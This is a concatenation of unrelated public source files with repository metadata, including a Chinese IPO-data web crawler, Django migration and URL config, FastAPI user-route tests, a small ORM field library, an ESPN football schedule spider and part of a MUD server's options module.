# print np.sum(AMBER_Force[:3], axis=0)
# Final printout
print "Energy Difference (kJ/mol):"
for i in range(len(D_Names)):
print "%-14s % .6e" % (D_Names[i], D_Energy[i])
print "RMS / Max Force Difference (kJ/mol/nm):"
for i in range(len(D_Names)):
print "%-14s % .6e % .6e" % (D_Names[i], D_FrcRMS[i], D_FrcMax[i])
if __name__ == "__main__":
main()
|
[
"kmckiern@stanford.edu"
] |
kmckiern@stanford.edu
|
1a9c0582881aadedc8e4ddbfe2db0f031c65bf04
|
0a973640f0b02d7f3cf9211fcce33221c3a50c88
|
/.history/src/easy-money_20210202115145.py
|
2ec490dc5b008658f27f3b4bf5b19dc59224777f
|
[] |
no_license
|
JiajunChen123/IPO_under_review_crawler
|
5468b9079950fdd11c5e3ce45af2c75ccb30323c
|
031aac915ebe350ec816c05a29b5827fde588567
|
refs/heads/main
| 2023-02-26T08:23:09.622725
| 2021-02-04T10:11:16
| 2021-02-04T10:11:16
| 332,619,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,153
|
py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# 东方财富网 首发申报
import re
import pickle
from datetime import datetime, timedelta
from urllib.parse import urlencode
import pandas as pd
import requests
import re
import time
from bs4 import BeautifulSoup
import configparser
import os.path
from utils import save_pickle,load_pickle
config = configparser.ConfigParser()
config.read('./src/Config.ini')
# headers = config['eastmoney']['headers']
base_url = config['eastmoney']['base_url']
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'}
def dateList_gen():
r = requests.get('http://data.eastmoney.com/xg/xg/sbqy.html',
headers=headers)
r.encoding = 'gbk'
soup = BeautifulSoup(r.text, 'html.parser')
dateList = [i.text for i in soup.findAll('option')]
return dateList
def update_date():
r = requests.get('http://data.eastmoney.com/xg/xg/sbqy.html',
headers=headers)
r.encoding = 'gbk'
soup = BeautifulSoup(r.text, 'html.parser')
newDate = soup.find('option').get_text()
return newDate
def update_eastmoneyData(newDate):
# 如果文件存在,执行更新
if os.path.isfile(config['eastmoney']['eastmoney_raw_data']):
# newDate = update_date()
# 如果有更新
if newDate != config['eastmoney']['lastDate']:
query = {
'type': 'NS',
'sty': 'NSFR',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '5000',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': '1',
'fd': newDate,
'rt': '53721774'
}
url = base_url + urlencode(query)
rs = requests.get(url, headers=headers)
js = rs.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(js[:-1])
temp = [i.split(',') for i in data]
columns = [
'会计师事务所', '保荐代表人', '保荐机构', 'xxx', '律师事务所', '日期', '所属行业', '板块',
'是否提交财务自查报告', '注册地', '类型', '机构名称', '签字会计师', '签字律师', '时间戳', '简称'
]
df = pd.DataFrame(temp, columns=columns)
df['文件链接'] = df['时间戳'].apply(
lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf"
)
df = df[[
'机构名称', '类型', '板块', '注册地', '保荐机构', '保荐代表人', '律师事务所', '签字律师', '会计师事务所',
'签字会计师', '是否提交财务自查报告', '所属行业', '日期', 'xxx', '时间戳', '简称', '文件链接'
]]
df = df[df['板块'] != '创业板']
df.replace({'是否提交财务自查报告': ' '}, '是')
df.replace({'是否提交财务自查报告': '不适用'}, '是')
df['机构名称'] = df['机构名称'].replace(r'\*', '', regex=True)
df['机构名称'] = df['机构名称'].replace(r'股份有限公司', '', regex=True)
df.to_csv(
'C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_raw_data.csv',mode='a',
index=False, header=False, encoding='utf-8-sig')
return df
else:
df = pd.read_csv(config['eastmoney']['eastmoney_raw_data'])
else:
dateList = dateList_gen()
df = get_eastmoneyData(dateList)
return df
def get_eastmoneyData(dateList):
query = {'type': 'NS',
'sty': 'NSFR',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '5000',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': '1',
'fd' :'',
'rt': '53721774'
}
main_data = []
for date in dateList:
print('fetching date: ',date)
query['fd'] = date
# start = datetime.strptime('2017-01-05','%Y-%m-%d').date()
# while start < datetime.today().date():
# query['fd'] = start
url = base_url + urlencode(query)
print(url)
# yield url
# start += timedelta(days=7)
rs = requests.get(url, headers=headers)
if rs.text == '':
continue
js = rs.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(js[:-1])
main_data.extend(data)
time.sleep(2)
temp = [i.split(',') for i in main_data]
columns = [
'会计师事务所', '保荐代表人', '保荐机构', 'xxx', '律师事务所', '日期', '所属行业', '板块',
'是否提交财务自查报告', '注册地', '类型', '机构名称', '签字会计师', '签字律师', '时间戳', '简称'
]
df = pd.DataFrame(temp, columns=columns)
df['文件链接'] = df['时间戳'].apply(
lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf"
)
df = df[[
'机构名称', '类型', '板块', '注册地', '保荐机构', '保荐代表人', '律师事务所', '签字律师', '会计师事务所',
'签字会计师', '是否提交财务自查报告', '所属行业', '日期', 'xxx', '时间戳', '简称', '文件链接'
]]
df = df[df['板块'] != '创业板']
df.replace({'是否提交财务自查报告': ' '}, '是')
df.replace({'是否提交财务自查报告': '不适用'}, '是')
df['机构名称'] = df['机构名称'].replace(r'\*', '', regex=True)
df['机构名称'] = df['机构名称'].replace(r'股份有限公司', '', regex=True)
df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_raw_data.csv',
index=False,
encoding='utf-8-sig')
return df
def get_meetingData(newDate):
if newDate != config['eastmoney']['lastDate'] or not os.path.isfile(config['eastmoney']['eastmoney_meeting']):
meetingInfo = []
for marketType in ['2', '4']: # 2 为主板, 4 为中小板
query = {
'type': 'NS',
'sty': 'NSSH',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '5000',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': marketType,
'rt': '53723990'
}
url = base_url + urlencode(query)
rss = requests.get(url, headers=headers)
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
meetingInfo.extend(data)
temp = [j.split(',') for j in meetingInfo]
columns = [
'时间戳', 'yyy', '公司代码', '机构名称', '详情链接', '申报日期', '上会日期', '申购日期', '上市日期',
'9', '拟发行数量', '发行前总股本', '发行后总股本', '13', '占发行后总股本比例', '当前状态', '上市地点',
'主承销商', '承销方式', '发审委委员', '网站', '简称'
]
df = pd.DataFrame(temp, columns=columns)
df['文件链接'] = df['时间戳'].apply(
lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf"
)
df['详情链接'] = df['公司代码'].apply(
lambda x: "data.eastmoney.com/xg/gh/detail/" + x + ".html")
df = df[[
'机构名称', '当前状态', '上市地点', '拟发行数量', '申报日期', '上会日期', '申购日期', '上市日期',
'主承销商', '承销方式', '9', '发行前总股本', '发行后总股本', '13', '占发行后总股本比例', '发审委委员',
'网站', '公司代码', 'yyy', '时间戳', '简称', '详情链接', '文件链接'
]]
df.to_csv(
config['eastmoney']['eastmoney_meeting'],
index=False,
encoding='utf-8-sig')
else:
df = pd.read_csv(config['eastmoney']['eastmoney_meeting'])
return df
def update_zzscData(newDate):
if os.path.isfile(config['eastmoney']['zzsc_pkl']):
if newDate != config['eastmoney']['lastDate']:
zzsc_dict = load_pickle(config['eastmoney']['zzsc_pkl'])
query = {
'type': 'NS',
'sty': 'NSSE',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '500',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': '4',
'stat': 'zzsc',
'fd': newDate,
'rt': '53727636'
}
url = base_url + urlencode(query)
rss = requests.get(url, headers=headers)
if rss.text == 'var IBhynDx={pages:0,data:[{stats:false}]}':
return
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
for i in data:
name = i.split(',')[1]
if name not in zzsc_dict:
zzsc_dict[name] = i.split(',')[2]
else:
continue
zzsc_df = pd.DataFrame(zzsc_dict.items(), columns=['机构名称', '决定终止审查时间'])
zzsc_df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_zzsc.csv',mode='a',
encoding='utf-8-sig',
index=False)
save_pickle(zzsc_dict,config['eastmoney']['zzsc_pkl'])
else:
zzsc_df = pd.read_csv(config['eastmoney']['zzsc_csv'])
else:
dateList = dateList_gen()
zzsc_df = get_zzscData(dateList)
return zzsc_df
def get_zzscData(dateList):
zzsc_dict = {}
for date in dateList:
query = {
'type': 'NS',
'sty': 'NSSE',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '500',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': '4',
'stat': 'zzsc',
'fd': date,
'rt': '53727636'
}
url = base_url + urlencode(query)
rss = requests.get(url, headers=headers)
if rss.text == 'var IBhynDx={pages:0,data:[{stats:false}]}':
continue
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
for i in data:
name = i.split(',')[1]
if name not in zzsc_dict:
zzsc_dict[name] = i.split(',')[2]
else:
continue
time.sleep(2)
zzsc_df = pd.DataFrame(zzsc_dict.items(), columns=['机构名称', '决定终止审查时间'])
zzsc_df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_zzsc.csv',
encoding='utf-8-sig',
index=False)
save_pickle(zzsc_dict,config['eastmoney']['zzsc_pkl'])
return zzsc_df
def eastmoney_cleanUP():
east_money = pd.read_csv(
'C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_raw_data.csv')
east_money.replace({'是否提交财务自查报告': ' '}, '是')
east_money.replace({'是否提交财务自查报告': '不适用'}, '是')
east_money['机构名称'] = east_money['机构名称'].replace(r'\*', '', regex=True)
east_money['机构名称'] = east_money['机构名称'].replace(r'股份有限公司', '', regex=True)
east_money['机构名称'] = east_money['机构名称'].replace(r'\(', '(', regex=True)
east_money['机构名称'] = east_money['机构名称'].replace(r'\)', ')', regex=True)
east_money = east_money[east_money['板块'] != '创业板']
east_money['类型'] = pd.Categorical(east_money['类型'],
categories=["已受理","已反馈","预先披露更新","中止审查","已提交发审会讨论,暂缓表决",
"已上发审会,暂缓表决","已通过发审会"],ordered=True)
east_money.sort_values(['机构名称','类型','受理日期'], inplace=True)
# east_money.to_csv('C:/Users/chen/Desktop/IPO_info/pre_cleab.csv',encoding='utf-8-sig',index=False)
east_money.drop_duplicates(subset=['机构名称', '类型'],
keep='first',
inplace=True)
east_money.to_csv(
'C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_data_cleaned.csv',
encoding='utf-8-sig',
index=False)
return east_money
def gen_finalData(cleaned_easymoney_df, meetingInfo_df, zzsc_df):
'''
主板、中小板 = {'机构名称':'',
'简称':'',
'Wind代码':'',
'统一社会信用代码':'',
'板块':'',
'注册地':'',
'所属行业':'',
'经营范围':'',
'预先披露':'[日期]',
'已反馈':'[日期]',
'预先披露更新':'[日期]',
'发审会':{'中止审查':'[日期]',
'已上发审会,暂缓表决':'[日期]',
'已提交发审会讨论,暂缓表决:'[日期]',
'已通过发审会':'[日期]'},
'终止审查':'[日期]',
'上市日期':'[日期]',
'保荐机构':'',
'律师事务所':,
'会计师事务所':'',
'发行信息':{'拟发行数量':'',
'发行前总股本':'',
'发行后总股本':''},
'反馈文件':'[链接]'
}
'''
shzb_stocksInfo = {} # 上海主板
szzxb_stocksInfo = {} # 深圳中小板
all_data = {} # 总数据
ekk = cleaned_easymoney_df.values.tolist()
for i in ekk:
i
if i[0] not in all_data:
all_data[i[0]] = {
'机构名称': i[0] + '股份有限公司',
'简称': i[15],
'Wind代码': '',
'统一社会信用代码': '',
'板块': i[2],
'注册地': '',
'所属行业': '',
'经营范围': '',
'预先披露': '',
'已反馈': '',
'预先披露更新': '',
'发审会': {
'中止审查': '',
'已上发审会,暂缓表决': '',
'已提交发审会讨论,暂缓表决': '',
'已通过发审会': ''
},
'终止审查': '',
'上市日期': '',
'保荐机构': i[4],
'保荐代表人': '',
'律师事务所': i[6],
'签字律师': '',
'会计师事务所': i[8],
'签字会计师': '',
'发行信息': {
'拟发行数量(万)': '',
'发行前总股本(万)': '',
'发行后总股本(万)': ''
},
'反馈文件': ''
}
if i[1] == '已受理':
all_data[i[0]]['预先披露'] = i[12]
elif i[1] == '已反馈':
all_data[i[0]]['已反馈'] = i[12]
elif i[1] == '预先披露更新':
all_data[i[0]]['预先披露更新'] = i[12]
elif i[1] == '已通过发审会':
all_data[i[0]]['发审会']['已通过发审会'] = i[12]
elif i[1] == '已提交发审会讨论,暂缓表决':
all_data[i[0]]['发审会']['已提交发审会讨论,暂缓表决'] = i[12]
elif i[1] == '已上发审会,暂缓表决':
all_data[i[0]]['发审会']['已上发审会,暂缓表决'] = i[12]
elif i[1] == '中止审查':
all_data[i[0]]['发审会']['中止审查'] = i[12]
if all_data[i[0]]['注册地'] == '' and i[3] != '':
all_data[i[0]]['注册地'] = i[3]
if all_data[i[0]]['所属行业'] == '' and i[11] != '':
all_data[i[0]]['所属行业'] = i[11]
if all_data[i[0]]['保荐代表人'] == '' and i[5] != '':
all_data[i[0]]['保荐代表人'] = i[5]
if all_data[i[0]]['签字律师'] == '' and i[7] != '':
all_data[i[0]]['签字律师'] = i[7]
if all_data[i[0]]['签字会计师'] == '' and i[9] != '':
all_data[i[0]]['签字会计师'] = i[9]
# 添加上会形象
ekk2 = meetingInfo_df.values.tolist()
error_set = {}
for i in ekk2:
i[0] = i[0].replace(r'股份有限公司', '')
if i[0] not in all_data:
print("Error: Cannot find ", i[0])
error_set.update({i[0]: i[5]})
continue
if i[1] == '上会未通过':
all_data[i[0]]['发审会']['上会未通过'] = i[5]
elif i[1] == '取消审核':
all_data[i[0]]['发审会']['取消审核'] = i[5]
elif i[1] == '上会通过':
all_data[i[0]]['发审会']['已通过发审会'] = i[5]
if i[7] != '':
all_data[i[0]]['上市时间'] = i[7]
all_data[i[0]]['发行信息']['拟发行数量'] = "{:.2f}".format(int(i[3]) / 10000)
all_data[i[0]]['发行信息']['发行前总股本'] = "{:.2f}".format(int(i[11]) / 10000)
all_data[i[0]]['发行信息']['发行后总股本'] = "{:.2f}".format(int(i[12]) / 10000)
# 添加终止审查信息
ekk3 = zzsc_df.values.tolist()
for i in ekk3:
name = i[0].replace(r'股份有限公司', '')
if name not in all_data:
print("Error: Cannot find in zzsc", i[0])
error_set.update({name: i[1]})
continue
all_data[name]['终止审查'] = i[1]
for key, value in all_data.items():
if value['板块'] == '中小板' and value['终止审查'] == '' and value['上市日期'] == '':
szzxb_stocksInfo.update({key: value})
if value['板块'] == '主板企业' and value['终止审查'] == '' and value['上市日期'] == '':
shzb_stocksInfo.update({key: value})
save_pickle(szzxb_stocksInfo, config['eastmoney']['szzxb_stocksInfo'])
save_pickle(shzb_stocksInfo, config['eastmoney']['shzb_stocksInfo'])
save_pickle(all_data, config['eastmoney']['zb_zxb_stocksInfo'])
return all_data, shzb_stocksInfo, szzxb_stocksInfo
# def update_all():
# try:
# with open('','rb') as file:
# zb_zxb_dict = pickle.load(file)
# _,temp = update_eastmoneyData()
# for i in temp:
# if i not in zb_zxb_dict:
# pass
# else:
# # columns = [
# # '会计师事务所', '保荐代表人', '保荐机构', 'xxx', '律师事务所', '日期', '所属行业', '板块',
# # '是否提交财务自查报告', '注册地', '类型', '机构名称', '签字会计师', '签字律师', '时间戳', '简称'
# # ]
# i[]
if __name__ == '__main__':
newDate = update_date()
update_eastmoneyData(newDate)
east_money_df = eastmoney_cleanUP()
meetingInfo_df = get_meetingData(newDate)
zzsc_df = update_zzscData(newDate)
# dateList = date_gen()
# get_eastmoneyData(dateList)
# east_money_df = eastmoney_cleanUP()
# east_money_df = pd.read_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/easymoney_data_new.csv',keep_default_na=False)
# meetingInfo_df = pd.read_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_data_meeting.csv',keep_default_na=False)
# meetingInfo_df = get_meetingData()
# zzsc_df = pd.read_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/zzsc.csv')
all_data,_,_ = gen_finalData(east_money_df,meetingInfo_df,zzsc_df)
print('Complete!')
|
[
"chenjiajun.jason@outlook.com"
] |
chenjiajun.jason@outlook.com
|
f905ba677261eb44247ee0d2cae42ade3f0e3697
|
bbcb57ec37b81e566dfb27936dbf71c544776a11
|
/eventkit_cloud/tasks/migrations/0017_auto_20170623_0011.py
|
f9f5fb33171ef484f85b24a15d35eaebffaf8992
|
[] |
no_license
|
bradh/eventkit-cloud
|
8bfa85ccff4aaed879f3fac1e48025053b719615
|
7238e5e33fcef29a12cc50328a52afa1292e23aa
|
refs/heads/master
| 2020-03-07T12:51:34.994546
| 2018-03-28T13:03:31
| 2018-03-28T13:03:31
| 127,486,879
| 0
| 0
| null | 2018-03-31T01:04:18
| 2018-03-31T01:04:18
| null |
UTF-8
|
Python
| false
| false
| 762
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-06-23 00:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0016_auto_20170622_2359'),
]
operations = [
migrations.RenameField(
model_name='exporttask',
old_name='new_result',
new_name='result',
),
migrations.RemoveField(
model_name='fileproducingtaskresult',
name='task',
),
migrations.AlterField(
model_name='fileproducingtaskresult',
name='id',
field=models.AutoField(primary_key=True, editable=False, serialize=False),
),
]
|
[
"joseph.svrcek@rgi-corp.com"
] |
joseph.svrcek@rgi-corp.com
|
1a95ca5c5a371e2fdc0ceba339b688dedd2ee9e0
|
0a82a05be26aa10aba5968cd9d07fb83e76877e0
|
/orm_relationship_demo/urls.py
|
037c92143399ab3935fe85fcb43c0af0c52bc528
|
[] |
no_license
|
RubbishBird/orm_relationship_demo
|
5179a83488cb43a1988734770b576547889f17cc
|
ab29c98b52eb6230d99a399a67827b152de522a0
|
refs/heads/master
| 2020-04-07T16:45:40.368680
| 2018-11-27T00:22:42
| 2018-11-27T00:22:42
| 158,541,900
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 773
|
py
|
"""orm_relationship_demo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
urlpatterns = [
path('', include('article.urls')),
]
|
[
"1158784496@qq.com"
] |
1158784496@qq.com
|
d47affe9a305639d964aacb372d3479ab318e72a
|
80600ef7dfc21fc13e1e91aa96f989e143dc8fc8
|
/tests/test_users_routing.py
|
2a7d8f35ed8af93db16770bbe0cfe6f17f935cf2
|
[] |
no_license
|
TooTiredOne/movies-rating
|
eb6ae4c7c98e820755519263ccb02b8b96aebdb1
|
c94876a3cc438b9ca873d85e594edb8e6320437d
|
refs/heads/master
| 2023-04-04T04:58:16.045862
| 2021-04-27T13:22:18
| 2021-04-27T13:22:18
| 362,119,325
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,465
|
py
|
import json
import pytest
from app import models, schemas
from app.utils import make_password_hash
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
def test_registration(unauth_client, session, db_users):
response = unauth_client.post(
'/users', json={'username': 'new_user', 'password': 'pass'}
)
users = session.query(models.User).all()
new_user = session.query(models.User).filter_by(username='new_user').one()
assert response.status_code == 201
assert response.json()['username'] == 'new_user'
assert new_user.hashed_password == make_password_hash('pass')
assert len(users) == len(db_users) + 1
def test_registration_existing_username(unauth_client, session, db_users):
response = unauth_client.post(
'/users', json={'username': 'username1', 'password': 'pass'}
)
users = session.query(models.User).all()
assert response.status_code == 409
assert response.json() == {'detail': 'Username already taken'}
assert len(users) == len(db_users)
@pytest.mark.parametrize(('limit', 'after_id'), [(20, 0), (1, 0), (1, 1), (1, 2)])
def test_get_all_users(session, auth_client, limit, after_id, db_users):
# new_user, auth = new_user_and_auth_head
response = auth_client.get(f'/users?limit={limit}&after_id={after_id}')
data = response.json()
expected_users = set(
(db_user.username, db_user.id)
for db_user in session.query(models.User)
.filter(models.User.id > after_id)
.order_by(models.User.id)
.limit(limit)
.all()
)
obtained_users = set((user['username'], user['id']) for user in data)
assert response.status_code == 200
assert expected_users == obtained_users
@pytest.mark.parametrize(('limit', 'after_id'), [(0, 0), (3, 'invalid')])
def test_get_all_users_incorrect_args(auth_client, limit, after_id, db_users):
response = auth_client.get(f'/users?limit={limit}&after_id={after_id}')
assert response.status_code == 422
assert 'detail' in response.json()
@pytest.mark.parametrize(('user_id', 'movie_id'), [(1, 2), (2, 2), (1, 3)])
def test_get_user_review_on_movie_correct_args(
user_id, movie_id, auth_client, session, db_user1_reviews, db_user2_reviews
):
response = auth_client.get(f'/users/{user_id}/reviews/movies/{movie_id}')
expected_review = (
db_user1_reviews[movie_id - 1]
if user_id == 1
else db_user2_reviews[movie_id - 1]
)
expected_schema = (
schemas.Review.from_orm(expected_review) if expected_review else None
)
assert response.status_code == 200
if expected_schema:
assert response.json() == json.loads(expected_schema.json())
else:
assert not response.json()
@pytest.mark.parametrize(
('user_id', 'movie_id'),
[(100, 1), (1, 100), ('invalid string', 2), (2, 'invalid string')],
)
def test_get_user_review_on_movie_incorrect_args(
user_id, movie_id, auth_client, db_reviews
):
response = auth_client.get(f'/users/{user_id}/reviews/movies/{movie_id}')
if user_id == 'invalid string' or movie_id == 'invalid string':
assert response.status_code == 422
else:
assert response.status_code == 404
assert 'detail' in response.json()
@pytest.mark.parametrize(
'user_id',
[
1,
2,
],
)
def test_get_user_reviews_correct_args(
user_id, session, auth_client, db_user1_reviews, db_user2_reviews
):
response = auth_client.get(f'/users/{user_id}/reviews')
data = response.json()
reviews = db_user1_reviews if user_id == 1 else db_user2_reviews
expected_reviews = []
for review in reviews:
json_str = schemas.Review.from_orm(review).json()
expected_reviews.append(json.loads(json_str))
assert response.status_code == 200
assert data == expected_reviews
@pytest.mark.parametrize(
('user_id', 'limit', 'after_id', 'expected_code'),
[
(100, 20, 0, 404),
('invalid string', 20, 0, 422),
(1, 0, None, 422),
(1, 'invalid string', 0, 422),
(1, 3, 'incorrect bookmark', 422),
],
)
def test_get_user_reviews_incorrect_args(
user_id, limit, after_id, session, auth_client, db_reviews, expected_code
):
response = auth_client.get(
f'/users/{user_id}/reviews?limit={limit}&after_id={after_id}'
)
assert response.status_code == expected_code
assert 'detail' in response.json()
|
[
"kamaliyevkamil@gmail.com"
] |
kamaliyevkamil@gmail.com
|
1cea20b10c1c9935a7f33d90947c6af0f674d65e
|
2e16e1a986f20deaf35eb5d649a93cc093e246f6
|
/light/light_types.py
|
6ce316876908bf367c827f3eedd2e21aba0f5752
|
[
"MIT"
] |
permissive
|
crits/light
|
77569688c71d98f7fdc23a406656b608e269297c
|
ae2fdc51c2666338d7a17a43f34873c6849c57a4
|
refs/heads/master
| 2020-03-23T08:09:37.045784
| 2018-09-30T03:16:54
| 2018-09-30T03:16:54
| 141,310,970
| 5
| 3
|
MIT
| 2018-09-30T03:16:55
| 2018-07-17T15:45:24
|
Python
|
UTF-8
|
Python
| false
| false
| 3,674
|
py
|
import bson
from . import backend
class LightField(object):
def __init__(self, init=None, required=False, pk=False, unique=False):
self.required = required
self.pk = pk
self.unique = unique
self.assign(init)
self.field_name = type(self).__name__
def val(self):
return self.value
def assign(self, val):
self.value = val
return val
def __str__(self):
return str(self.val())
class LightStr(LightField):
def __init__(self, init=None, required=False, pk=False, unique=False):
super(LightStr, self).__init__(init, required, pk, unique)
def assign(self, val):
assert(isinstance(val, str))
super(LightStr, self).assign(val)
class LightInt(LightField):
def __init__(self, init=None, required=False, pk=False, unique=False):
super(LightInt, self).__init__(init, required, pk, unique)
def assign(self, val):
assert(isinstance(val, int))
super(LightInt, self).assign(val)
class LightBool(LightField):
def __init__(self, init=None, required=False, pk=False, unique=False):
super(LightBool, self).__init__(init, required, pk, unique)
def assign(self, val):
assert(isinstance(val, bool))
super(LightBool, self).assign(val)
# A base type for a document object that, at least, matches the following
# signature:
#
# obj = {
# "id": ObjectId()
# }
#
class LightDoc(object):
def __init__(self, **kwargs):
self.special_fields = ['set_name']
self.valid = False
self.set_name = type(self).set_name
self.data = {}
self.pk = None
# Dynamically identify the defined fields from the subclass definition
db_fields = filter(lambda x: isinstance(getattr(type(self),x),LightField), vars(type(self)))
for fieldk in db_fields:
new_field = getattr(type(self), fieldk)
self.data[fieldk] = new_field.val()
assert(not(self.pk and new_field.pk))
self.pk = new_field
if 'oid' not in kwargs or kwargs['oid'] == None:
# If instance construction gives us a NoneType oid, then we presume
# to be constructing a new entitiy, so give it a brand new ObjectId
self.data['id'] = bson.ObjectId()
# Also, walk the rest of the args for field initializers
for fieldk in db_fields:
if fieldk in kwargs:
self.data[fieldk] = type(getattr(self, fieldk))(init=kwargs[fieldk])
else:
self.data[fieldk] = type(getattr(self, fieldk))()
else:
# Otherwise, we are to perform a lookup and load of the designated
# object
self.load(kwargs['oid'])
def get_all(set_name, dtype):
for objid in backend.current_driver.get_all(set_name=set_name):
yield(dtype(oid=objid))
def save(self):
output_data = {}
for obj_key in self.data:
output_data[obj_key] = str(self.data[obj_key])
backend.current_driver.store(self.set_name, output_data)
def load(self, objid):
input_data = backend.current_driver.load(self.set_name, objid)
# Clear the instance data
self.data = {}
if input_data:
for obj_key in input_data:
if obj_key == 'id':
self.data[obj_key] = bson.ObjectId(input_data[obj_key])
else:
self.data[obj_key] = input_data[obj_key]
self.valid = True
else:
# Invalidate if the object doesn't exist
self.valid = False
|
[
"ckane@colemankane.org"
] |
ckane@colemankane.org
|
b10bd2955078b3d0376df93af01e66898e23f7bc
|
7015c9e091adfc90822706d78a066ae780266e43
|
/college_football_scraper/spiders/pro_football_spider.py
|
9bb88df7171dc5b2aade22d94385a5c3db0b00f3
|
[] |
no_license
|
Nemesisesq/crawlers
|
bf97523f4f57b7eef58e7f8ce04bd5a8fc98688e
|
0c7924a968b8525a0df7d11e64ba373daecf2a3e
|
refs/heads/master
| 2021-03-16T05:30:14.834286
| 2016-08-19T01:34:57
| 2016-08-19T01:34:57
| 66,019,523
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,331
|
py
|
from datetime import datetime
import scrapy
from scrapy.shell import inspect_response
from college_football_scraper.items import ProFootballScraperItem
class ProFootballSpider(scrapy.Spider):
name = "pro_football"
allowed_domains = ["espn.com"]
start_urls = [
"http://www.espn.com/nfl/teams"
]
def parse(self, response):
filename = response.url.split("/")[-2] + ".html"
with open(filename, 'wb') as f:
f.write(response.body)
for sel in response.css(".span-2 > .mod-container ul li span"):
url = response.urljoin(sel.xpath('a/@href')[1].extract())
yield scrapy.Request(url, callback=self.parse_schedule_content)
crawled = []
def parse_schedule_content(self, response):
self.crawled.append(response.css('.sub-brand-title b::text').extract())
item = ProFootballScraperItem()
# item['date_create'] = datetime.now()
item['name'] = response.css('.sub-brand-title b::text').extract()
item['games'] = []
for game in response.css('table tr[class*=row]'):
if game.css('td::text').extract()[1] == 'BYE WEEK':
x = 'BYE WEEK'
else:
x = {
'date': game.css('td::text').extract()[1],
'opponent': {
'logo': game.css('td ul .team-logo-small a::attr(href)').extract()[0],
'name': game.css('td ul .team-name a::text').extract()[0]
},
'result_time': {
'time': self.get_result(game),
'network': self.get_network(game)
}
}
inspect_response(response, self)
item['games'].append(x)
yield item
print(len(self.crawled))
def get_network(self, game):
if game.css('td')[3].xpath('text()'):
return game.css('td')[3].xpath('text()').extract()[0].split(' ')[2]
return 'played'
def get_result(self, game):
if game.css('td')[3].css('.game-status'):
return game.css('td')[3].css('.game-status span::text').extract()
if game.css('td')[3].xpath('text()'):
return game.css('td')[3].xpath('text()').extract()[0]
|
[
"Nem@Carls-MacBook-Pro.local"
] |
Nem@Carls-MacBook-Pro.local
|
1439f8a0bd6e39194e12cf014e1b345a92b08fee
|
1e0de646b9f291ace218c3cf8e37b4631c8add79
|
/src/mudsling/options.py
|
b776bdf0793f3fc229ba0ae8a8ab6eb6614724ed
|
[] |
no_license
|
joshbenner/mudsling
|
ede02460c0cf3023590713741088c1016f8982bf
|
ed0f00c2a47779ee7df5cf7945fb028d9358bd80
|
refs/heads/master
| 2021-01-17T19:13:31.464822
| 2017-06-18T00:56:39
| 2017-06-18T00:56:39
| 60,486,472
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,163
|
py
|
"""
Shared options for the twisted plugins. Since the custom app runner basically
passes the commandline arguments through, both proxy and server should both
parse the same arguments.
"""
import os
import sys
from pkg_resources import resource_exists, resource_filename
from twisted.python import usage
class Options(usage.Options):
optFlags = [["simple", "s", "Run in a single process with no proxy and a "
"simple Telnet service."]]
optParameters = [
["gamedir", "g", os.path.abspath(os.path.curdir),
"The path to the game directory."],
]
def __init__(self):
super(Options, self).__init__()
self['extra_configs'] = []
def config_paths(self):
"""
Determine the list of locations where configuration files can be found.
:rtype: list
"""
paths = []
if resource_exists('mudsling', 'defaults.cfg'):
paths.append(resource_filename('mudsling', 'defaults.cfg'))
paths.append("%s/settings.cfg" % self['gamedir'])
paths.extend(self['extra_configs'])
return [os.path.abspath(p) for p in paths]
def opt_config(self, path):
"""
Specify path to extra config file. Can be used more than once.
"""
self['extra_configs'].append(os.path.abspath(path))
opt_c = opt_config
def opt_version(self):
"""
Display MUDSling and Twisted versions, then exit.
"""
